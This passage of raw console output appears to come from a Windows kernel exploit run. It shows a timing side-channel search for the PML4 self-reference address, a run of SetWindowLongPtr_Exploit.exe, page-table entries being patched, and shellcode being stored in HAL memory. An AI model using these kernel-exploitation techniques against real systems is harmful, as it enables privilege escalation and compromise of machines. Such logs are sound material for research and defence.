ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! 
- Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n \r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: 
ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: 
ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: 
ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: 
ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: 
ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n \r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 
................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 
................\r\n \r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 
